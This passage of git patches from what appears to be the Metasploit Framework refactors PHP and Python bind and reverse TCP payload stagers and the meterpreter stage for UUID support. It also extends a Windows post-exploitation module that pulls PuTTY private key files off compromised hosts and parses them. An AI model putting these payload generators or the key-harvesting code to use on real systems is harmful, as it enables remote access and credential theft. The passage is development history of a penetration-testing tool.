-    cmd << "b.bind(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "b.bind(('0.0.0.0',#{opts[:port]}))\n"
     cmd << "b.listen(1)\n"
     cmd << "s,a=b.accept()\n"
     cmd << py_send_uuid if include_send_uuid
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index cfe7556574..611eab064e 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -9,9 +9,9 @@ require 'msf/base/sessions/meterpreter_php'
 require 'msf/base/sessions/meterpreter_options'
 
 
-module Metasploit3
+module Metasploit4
 
-  CachedSize = 24947
+  CachedSize = 25532
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
@@ -33,11 +33,18 @@ module Metasploit3
     met = File.open(file, "rb") {|f|
       f.read(f.stat.size)
     }
+
     met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
     met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']
 
-    # remove comments and compress whitespace to make it smaller and a
-    # bit harder to analyze
+    uuid = Msf::Payload::UUID.new(
+      platform: 'php',
+      arch:     ARCH_PHP
+    )
+
+    bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
+    met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
+
     met.gsub!(/#.*$/, '')
     met = Rex::Text.compress(met)
     met
diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb
index 9f135f97fc..ca2a843850 100644
--- a/modules/payloads/stagers/php/bind_tcp.rb
+++ b/modules/payloads/stagers/php/bind_tcp.rb
@@ -4,15 +4,15 @@
 ##
 
 require 'msf/core'
-require 'msf/core/payload/php'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/php/bind_tcp'
 
-module Metasploit3
+module Metasploit4
 
-  CachedSize = 1418
+  CachedSize = 1183
 
   include Msf::Payload::Stager
-  include Msf::Payload::Php
+  include Msf::Payload::Php::BindTcp
 
   def initialize(info = {})
     super(merge_info(info,
@@ -26,18 +26,5 @@ module Metasploit3
       'Stager'        => { 'Payload' => "" }
       ))
   end
-  def generate
-    bind = File.read(File.join(Msf::Config::InstallRoot, 'data', 'php', 'bind_tcp.php'))
-    bind.gsub!("4444", "#{datastore["LPORT"]}")
 
-    return super + bind
-  end
-
-  #
-  # PHP's read functions suck, make sure they know exactly how much data to
-  # grab by sending a length.
-  #
-  def handle_intermediate_stage(conn, payload)
-    conn.put([payload.length].pack("N"))
-  end
 end
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb
index cbde929631..4698f162a2 100644
--- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb
@@ -4,15 +4,15 @@
 ##
 
 require 'msf/core'
-require 'msf/core/payload/php'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/php/bind_tcp'
 
-module Metasploit3
+module Metasploit4
 
-  CachedSize = 1350
+  CachedSize = 1182
 
   include Msf::Payload::Stager
-  include Msf::Payload::Php
+  include Msf::Payload::Php::BindTcp
 
   def self.handler_type_alias
     "bind_tcp_ipv6"
@@ -20,34 +20,19 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind TCP Stager IPv6',
-      'Description'   => 'Listen for a connection over IPv6',
-      'Author'        => ['egypt'],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'php',
-      'Arch'          => ARCH_PHP,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Stager'        => { 'Payload' => "" }
+      'Name'        => 'Bind TCP Stager IPv6',
+      'Description' => 'Listen for a connection over IPv6',
+      'Author'      => ['egypt'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'php',
+      'Arch'        => ARCH_PHP,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Stager'      => { 'Payload' => "" }
       ))
   end
-  def generate
-    if (datastore['LPORT'] and not datastore['LPORT'].empty?)
-      lport = datastore['LPORT']
-    else
-      lport = '4444'
-    end
 
-    bind = File.read(File.join(Msf::Config::InstallRoot, 'data', 'php', 'bind_tcp_ipv6.php'))
-    bind.gsub!("4444", lport)
-
-    return super + bind
+  def use_ipv6
+    true
   end
 
-  #
-  # PHP's read functions suck, make sure they know exactly how much data to
-  # grab by sending a length.
-  #
-  def handle_intermediate_stage(conn, payload)
-    conn.put([payload.length].pack("N"))
-  end
 end
diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb
index 96536cb67e..dfb8d9d864 100644
--- a/modules/payloads/stagers/php/reverse_tcp.rb
+++ b/modules/payloads/stagers/php/reverse_tcp.rb
@@ -4,50 +4,27 @@
 ##
 
 require 'msf/core'
-require 'msf/core/payload/php'
 require 'msf/core/handler/reverse_tcp'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
+require 'msf/core/payload/php/reverse_tcp'
 
-module Metasploit3
+module Metasploit4
 
-  CachedSize = 1303
+  CachedSize = 931
 
   include Msf::Payload::Stager
-  include Msf::Payload::Php
+  include Msf::Payload::Php::ReverseTcp
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'PHP Reverse TCP Stager',
-      'Description'   => 'Reverse PHP connect back stager with checks for disabled functions',
-      'Author'        => 'egypt',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'php',
-      'Arch'          => ARCH_PHP,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Stager'        => {'Payload' => ""}
-      ))
-  end
-
-  #
-  # Constructs the payload
-  #
-  def generate
-    reverse = File.read(File.join(Msf::Config::InstallRoot, 'data', 'php', 'reverse_tcp.php'))
-    reverse.gsub!("127.0.0.1", "#{datastore["LHOST"]}")
-    reverse.gsub!("4444", "#{datastore["LPORT"]}")
-    #reverse.gsub!(/#.*$/, '')
-    #reverse = Rex::Text.compress(reverse)
-
-    return super + reverse
-  end
-
-  #
-  # PHP's read functions suck, make sure they know exactly how much data to
-  # grab by sending a length.
-  #
-  def handle_intermediate_stage(conn, payload)
-    conn.put([payload.length].pack("N"))
+      'Name'        => 'PHP Reverse TCP Stager',
+      'Description' => 'Reverse PHP connect back stager with checks for disabled functions',
+      'Author'      => 'egypt',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'php',
+      'Arch'        => ARCH_PHP,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => {'Payload' => ""}
+    ))
   end
 
 end
diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb
index aaab854577..113f9b4828 100644
--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit4
 
-  CachedSize = 374
+  CachedSize = 386
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb
index 279b2d9d62..951a9b1c30 100644
--- a/modules/payloads/stagers/python/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit4
 
-  CachedSize = 474
+  CachedSize = 486
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb
index 08d5011f09..75b1a00929 100644
--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -14,7 +14,6 @@ module Metasploit4
   CachedSize = 342
 
   include Msf::Payload::Stager
-  include Msf::Payload::Python
   include Msf::Payload::Python::ReverseTcp
 
   def initialize(info = {})
diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb
index 08c4a8daf7..c978b93ff3 100644
--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -9,7 +9,8 @@ require 'msf/base/sessions/meterpreter_php'
 require 'msf/base/sessions/meterpreter_options'
 
 
-module Metasploit3
+module Metasploit4
+
   include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
@@ -26,22 +27,20 @@ module Metasploit3
   def generate_stage(opts={})
     file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
 
-    met = File.open(file, "rb") {|f|
+    met = File.open(file, "rb") { |f|
       f.read(f.stat.size)
     }
 
-    unless opts[:uuid]
-      uuid = Msf::Payload::UUID.new(
-        platform: 'php',
-        arch:     ARCH_PHP
-      )
-    end
+    uuid = opts[:uuid] || Msf::Payload::UUID.new(
+      platform: 'php',
+      arch:     ARCH_PHP
+    )
 
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
 
-    #met.gsub!(/#.*?$/, '')
-    #met = Rex::Text.compress(met)
+    met.gsub!(/#.*?$/, '')
+    met = Rex::Text.compress(met)
     met
   end
 end

From e2d4ed60451614b66e1c564c43131986c9533987 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 17:49:34 +1000
Subject: [PATCH 0106/1013] Add the UUID payloads for PHP

---
 .../stagers/php/bind_tcp_ipv6_uuid.rb         | 42 +++++++++++++++++++
 modules/payloads/stagers/php/bind_tcp_uuid.rb | 38 +++++++++++++++++
 .../payloads/stagers/php/reverse_tcp_uuid.rb  | 38 +++++++++++++++++
 3 files changed, 118 insertions(+)
 create mode 100644 modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
 create mode 100644 modules/payloads/stagers/php/bind_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/php/reverse_tcp_uuid.rb

diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
new file mode 100644
index 0000000000..a9ea0c45a0
--- /dev/null
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/php/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 1356
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Php::BindTcp
+
+  def self.handler_type_alias
+    "bind_tcp_ipv6_uuid"
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Bind TCP Stager IPv6 with UUID support',
+      'Description' => 'Listen for a connection over IPv6 with UUID support',
+      'Author'      => ['egypt'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'php',
+      'Arch'        => ARCH_PHP,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Stager'      => { 'Payload' => "" }
+      ))
+  end
+
+  def use_ipv6
+    true
+  end
+
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb
new file mode 100644
index 0000000000..f2729f810d
--- /dev/null
+++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb
@@ -0,0 +1,38 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/php/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 1357
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Php::BindTcp
+
+  def self.handler_type_alias
+    "bind_tcp_uuid"
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Bind TCP Stager with UUID support',
+      'Description' => 'Listen for a connection with UUID support',
+      'Author'      => ['egypt'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'php',
+      'Arch'        => ARCH_PHP,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Stager'      => { 'Payload' => "" }
+      ))
+  end
+
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
new file mode 100644
index 0000000000..91c2de5a5d
--- /dev/null
+++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -0,0 +1,38 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/php/reverse_tcp'
+
+module Metasploit4
+
+  CachedSize = 1105
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Php::ReverseTcp
+
+  def self.handler_type_alias
+    "reverse_tcp_uuid"
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'PHP Reverse TCP Stager',
+      'Description' => 'Reverse PHP connect back stager with checks for disabled functions',
+      'Author'      => 'egypt',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'php',
+      'Arch'        => ARCH_PHP,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => {'Payload' => ""}
+    ))
+  end
+
+  def include_send_uuid
+    true
+  end
+
+end

From 6c00e62649612be63661f0b6bdf088adc41f909e Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 19:11:33 +1000
Subject: [PATCH 0107/1013] Small fix to PHP stage

---
 modules/payloads/stages/php/meterpreter.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb
index c978b93ff3..5d6be8ce08 100644
--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -40,7 +40,7 @@ module Metasploit4
     met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
 
     met.gsub!(/#.*?$/, '')
-    met = Rex::Text.compress(met)
+    #met = Rex::Text.compress(met)
     met
   end
 end

From 77cf2ec60e7559b16d5a6652e28ef3875c9175b8 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Mon, 18 May 2015 11:20:53 +0100
Subject: [PATCH 0108/1013] Added basic private key detection and parsing

---
 .../gather/enum_putty_saved_sessions.rb       | 68 ++++++++++++++++++-
 1 file changed, 66 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index 915fbf9f0d..47653ecd40 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -16,6 +16,7 @@ class Metasploit3 < Msf::Post
 
   INTERESTING_KEYS = ['HostName', 'PublicKeyFile', 'UserName', 'PortNumber', 'PortForwardings']
   PAGEANT_REGISTRY_KEY = "HKCU\\Software\\SimonTatham\\PuTTY"
+  PUTTY_PRIVATE_KEY_ANALYSIS = ['Name','HostName','PublicKeyFile','Type','Cipher','Comment']
 
   def initialize(info = {})
     super(update_info(info,
@@ -74,6 +75,29 @@ class Metasploit3 < Msf::Post
     print_status("PuTTY saved sessions list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.savedsession' to view).")
   end
 
+  def display_private_key_analysis(info)
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => "PuTTY Private Keys",
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => ['Name','HostName','PublicKeyFile','Type','Cipher','Comment']
+    )
+
+    info.each do |result|
+      row = []
+      PUTTY_PRIVATE_KEY_ANALYSIS.each do |key|
+        row << result[key]
+      end
+      results_table << row
+    end
+
+    print_line
+    print_line results_table.to_s
+    #stored_path = store_loot('putty.sessions.csv', 'text/csv', session, results_table.to_csv, nil, "PuTTY Saved Sessions List")
+    #print_status("PuTTY saved sessions list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.savedsession' to view).")
+  end
+
   def get_stored_host_key_details(allkeys)
     # This hash will store (as the key) host:port pairs. This is basically a quick way of
     # getting a unique list of host:port pairs.
@@ -135,6 +159,7 @@ class Metasploit3 < Msf::Post
   end
 
   def grab_private_keys(sessions)
+    private_key_summary = []
     sessions.each do |ses|
       filename = ses['PublicKeyFile'].to_s
       next if filename.empty?
@@ -145,6 +170,41 @@ class Metasploit3 < Msf::Post
         if ppk # Attempt to read the contents of the file
           stored_path = store_loot('putty.ppk.file', 'application/octet-stream', session, ppk)
           print_good("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
+
+          # Now analyse the private key
+          private_key = {}
+          private_key['Name'] = ses['Name']
+          private_key['HostName'] = ses['HostName']
+          private_key['PublicKeyFile'] = ses['PublicKeyFile']
+          private_key['Type'] = ''
+          private_key['Cipher'] = ''
+          private_key['Comment'] = ''
+
+          # Get type of key
+          if ppk.to_s =~ /^SSH PRIVATE KEY FILE FORMAT 1.1/
+            # This is an SSH1 header
+            private_key['Type'] = 'ssh1'
+            if ppk[33] == "\x00"
+                private_key['Cipher'] = 'none'
+            elsif ppk[33] == "\x03"
+                private_key['Cipher'] = '3DES'
+            else
+                private_key['Cipher'] = '(Unrecognised)'
+            end
+          elsif rx = /^PuTTY-User-Key-File-2:\sssh-(?<keytype>rsa|dss)[\r\n]/.match(ppk.to_s)
+            # This is an SSH2 header
+            private_key['Type'] = "ssh2 (#{rx[:keytype]})"
+            if rx = /^Encryption:\s(?<cipher>[-a-z0-9]+?)[\r\n]/.match(ppk.to_s)
+                private_key['Cipher'] = rx[:cipher]
+            else
+                private_key['Cipher'] = '(Unrecognised)'
+            end
+
+            if rx = /^Comment:\s(?<comment>.+?)[\r\n]/.match(ppk.to_s)
+                private_key['Comment'] = rx[:comment]
+            end
+          end
+          private_key_summary << private_key
         else
           print_error("Unable to read PuTTY private key file for \'#{ses['Name']}\' (#{filename})") # May be that we do not have permissions etc
         end
@@ -152,6 +212,7 @@ class Metasploit3 < Msf::Post
         print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be read.")
       end
     end
+    private_key_summary
   end
 
   # Entry point
@@ -172,8 +233,11 @@ class Metasploit3 < Msf::Post
 
       # If the private key file has been configured, retrieve it and save it to loot
       print_status("Downloading private keys...")
-      grab_private_keys(all_saved_sessions)
-
+      private_key_info = grab_private_keys(all_saved_sessions)
+      if (!private_key_info.nil? && !private_key_info.empty?)
+        print_line
+        display_private_key_analysis(private_key_info) 
+      end
     end
 
     print_line # Just for readability

From 593f6e5fc4ef34ed99c598e6e4e991c04a699fc7 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 20:25:15 +1000
Subject: [PATCH 0109/1013] Fix issue with bind UUID

---
 lib/msf/core/payload/linux/bind_tcp.rb  | 7 ++++++-
 lib/msf/core/payload/linux/send_uuid.rb | 5 +++++
 2 files changed, 11 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb
index 06bc75f80d..148ae17c7e 100644
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -145,7 +145,12 @@ module Payload::Linux::BindTcp
         xchg eax,ebx
     ^
 
-    asm << asm_send_uuid if include_send_uuid
+    if include_send_uuid
+      asm << %Q^
+        mov edi, ebx
+        #{asm_send_uuid}
+      ^
+    end
 
     asm << %Q^
         mov dh,0xc                    ; at least 0x0c00 bytes
diff --git a/lib/msf/core/payload/linux/send_uuid.rb b/lib/msf/core/payload/linux/send_uuid.rb
index bc7bc34ee5..fb917448f2 100644
--- a/lib/msf/core/payload/linux/send_uuid.rb
+++ b/lib/msf/core/payload/linux/send_uuid.rb
@@ -30,6 +30,8 @@ module Payload::Linux::SendUUID
 
     asm =%Q^
       send_uuid:
+        push ebx                      ; store ebx for later
+        push ecx                      ; store ecx for later
         push 0                        ; terminate the args array
         push #{uuid_raw.length}       ; length of the UUID
         call get_uuid_address         ; put uuid buffer on tehe stack
@@ -42,6 +44,9 @@ module Payload::Linux::SendUUID
         push 0x66                     ; sys_socketcall
         pop eax
         int 0x80
+        add esp, 16                   ; put the stack back how it was
+        pop ecx                       ; restore ecx
+        pop ebx                       ; restore ebx
     ^
 
     asm

From 7f16b7164fcfdb0266922b6f45c559079e533d62 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Mon, 18 May 2015 11:43:08 +0100
Subject: [PATCH 0110/1013] Added database writing code

---
 .../gather/enum_putty_saved_sessions.rb       | 45 +++++++++++++++++++
 1 file changed, 45 insertions(+)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index 47653ecd40..4062ee250e 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -174,11 +174,14 @@ class Metasploit3 < Msf::Post
           # Now analyse the private key
           private_key = {}
           private_key['Name'] = ses['Name']
+          private_key['Port'] = ses['PortNumber']
+          private_key['UserName'] = ses['UserName']
           private_key['HostName'] = ses['HostName']
           private_key['PublicKeyFile'] = ses['PublicKeyFile']
           private_key['Type'] = ''
           private_key['Cipher'] = ''
           private_key['Comment'] = ''
+          private_key['KeyData'] = ppk
 
           # Get type of key
           if ppk.to_s =~ /^SSH PRIVATE KEY FILE FORMAT 1.1/
@@ -215,6 +218,43 @@ class Metasploit3 < Msf::Post
     private_key_summary
   end
 
+  def store_private_key_in_db(username,host,port,key)
+    service_data = { 
+      address: host,
+      port: port,
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+    }   
+
+    credential_data = { 
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      username: username,
+      realm: nil,
+      realm_key: nil,
+      auth_methods: ['publickey'],
+      key_data: key
+    }   
+
+    credential_data.merge!(service_data)
+
+    # Create the Metasploit::Credential::Core object
+    credential_core = create_credential(credential_data)
+    status = Metasploit::Model::Login::Status::UNTRIED
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = { 
+      core: credential_core,
+      status: status
+    }   
+
+    # Merge in the service data and create our Login
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
   # Entry point
   def run
     # Look for saved sessions, break out if not.
@@ -237,6 +277,11 @@ class Metasploit3 < Msf::Post
       if (!private_key_info.nil? && !private_key_info.empty?)
         print_line
         display_private_key_analysis(private_key_info) 
+        
+        # Store unencrypted keys in the DB
+        private_key_info.each do |ses|
+           store_private_key_in_db(ses['UserName'],ses['HostName'],ses['PortNumber'],ses['KeyData']) if ses['Cipher']=='none'
+        end
       end
     end
 

From cf05e695368d77f8fdc1dde8621eba3dfcf8e2c6 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Mon, 18 May 2015 11:51:27 +0100
Subject: [PATCH 0111/1013] Removed database storage for now (need to convert
 keys to OpenSSH format and resolve IP addresses first)

---
 .../gather/enum_putty_saved_sessions.rb       | 51 ++-----------------
 1 file changed, 4 insertions(+), 47 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index 4062ee250e..d1aa2ce8b5 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::Registry
 
-  INTERESTING_KEYS = ['HostName', 'PublicKeyFile', 'UserName', 'PortNumber', 'PortForwardings']
+  INTERESTING_KEYS = ['HostName', 'UserName', 'PublicKeyFile', 'PortNumber', 'PortForwardings']
   PAGEANT_REGISTRY_KEY = "HKCU\\Software\\SimonTatham\\PuTTY"
-  PUTTY_PRIVATE_KEY_ANALYSIS = ['Name','HostName','PublicKeyFile','Type','Cipher','Comment']
+  PUTTY_PRIVATE_KEY_ANALYSIS = ['Name','HostName','UserName','PublicKeyFile','Type','Cipher','Comment']
 
   def initialize(info = {})
     super(update_info(info,
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Post
       'Header'     => "PuTTY Private Keys",
       'Indent'     => 1,
       'SortIndex'  => -1,
-      'Columns'    => ['Name','HostName','PublicKeyFile','Type','Cipher','Comment']
+      'Columns'    => PUTTY_PRIVATE_KEY_ANALYSIS
     )
 
     info.each do |result|
@@ -174,19 +174,18 @@ class Metasploit3 < Msf::Post
           # Now analyse the private key
           private_key = {}
           private_key['Name'] = ses['Name']
-          private_key['Port'] = ses['PortNumber']
           private_key['UserName'] = ses['UserName']
           private_key['HostName'] = ses['HostName']
           private_key['PublicKeyFile'] = ses['PublicKeyFile']
           private_key['Type'] = ''
           private_key['Cipher'] = ''
           private_key['Comment'] = ''
-          private_key['KeyData'] = ppk
 
           # Get type of key
           if ppk.to_s =~ /^SSH PRIVATE KEY FILE FORMAT 1.1/
             # This is an SSH1 header
             private_key['Type'] = 'ssh1'
+            private_key['Comment'] = '-'
             if ppk[33] == "\x00"
                 private_key['Cipher'] = 'none'
             elsif ppk[33] == "\x03"
@@ -218,43 +217,6 @@ class Metasploit3 < Msf::Post
     private_key_summary
   end
 
-  def store_private_key_in_db(username,host,port,key)
-    service_data = { 
-      address: host,
-      port: port,
-      service_name: 'ssh',
-      protocol: 'tcp',
-      workspace_id: myworkspace_id,
-    }   
-
-    credential_data = { 
-      origin_type: :session,
-      session_id: session_db_id,
-      post_reference_name: refname,
-      username: username,
-      realm: nil,
-      realm_key: nil,
-      auth_methods: ['publickey'],
-      key_data: key
-    }   
-
-    credential_data.merge!(service_data)
-
-    # Create the Metasploit::Credential::Core object
-    credential_core = create_credential(credential_data)
-    status = Metasploit::Model::Login::Status::UNTRIED
-
-    # Assemble the options hash for creating the Metasploit::Credential::Login object
-    login_data = { 
-      core: credential_core,
-      status: status
-    }   
-
-    # Merge in the service data and create our Login
-    login_data.merge!(service_data)
-    create_credential_login(login_data)
-  end
-
   # Entry point
   def run
     # Look for saved sessions, break out if not.
@@ -277,11 +239,6 @@ class Metasploit3 < Msf::Post
       if (!private_key_info.nil? && !private_key_info.empty?)
         print_line
         display_private_key_analysis(private_key_info) 
-        
-        # Store unencrypted keys in the DB
-        private_key_info.each do |ses|
-           store_private_key_in_db(ses['UserName'],ses['HostName'],ses['PortNumber'],ses['KeyData']) if ses['Cipher']=='none'
-        end
       end
     end
 

From 8b8ed04a73611456cc52b809c967334d88284843 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Mon, 18 May 2015 11:56:12 +0100
Subject: [PATCH 0112/1013] Rubocop

---
 .../gather/enum_putty_saved_sessions.rb       | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index d1aa2ce8b5..00d38c0806 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
 
   INTERESTING_KEYS = ['HostName', 'UserName', 'PublicKeyFile', 'PortNumber', 'PortForwardings']
   PAGEANT_REGISTRY_KEY = "HKCU\\Software\\SimonTatham\\PuTTY"
-  PUTTY_PRIVATE_KEY_ANALYSIS = ['Name','HostName','UserName','PublicKeyFile','Type','Cipher','Comment']
+  PUTTY_PRIVATE_KEY_ANALYSIS = ['Name', 'HostName', 'UserName', 'PublicKeyFile', 'Type', 'Cipher', 'Comment']
 
   def initialize(info = {})
     super(update_info(info,
@@ -94,8 +94,8 @@ class Metasploit3 < Msf::Post
 
     print_line
     print_line results_table.to_s
-    #stored_path = store_loot('putty.sessions.csv', 'text/csv', session, results_table.to_csv, nil, "PuTTY Saved Sessions List")
-    #print_status("PuTTY saved sessions list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.savedsession' to view).")
+    # stored_path = store_loot('putty.sessions.csv', 'text/csv', session, results_table.to_csv, nil, "PuTTY Saved Sessions List")
+    # print_status("PuTTY saved sessions list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.savedsession' to view).")
   end
 
   def get_stored_host_key_details(allkeys)
@@ -187,23 +187,23 @@ class Metasploit3 < Msf::Post
             private_key['Type'] = 'ssh1'
             private_key['Comment'] = '-'
             if ppk[33] == "\x00"
-                private_key['Cipher'] = 'none'
+              private_key['Cipher'] = 'none'
             elsif ppk[33] == "\x03"
-                private_key['Cipher'] = '3DES'
+              private_key['Cipher'] = '3DES'
             else
-                private_key['Cipher'] = '(Unrecognised)'
+              private_key['Cipher'] = '(Unrecognised)'
             end
           elsif rx = /^PuTTY-User-Key-File-2:\sssh-(?<keytype>rsa|dss)[\r\n]/.match(ppk.to_s)
             # This is an SSH2 header
             private_key['Type'] = "ssh2 (#{rx[:keytype]})"
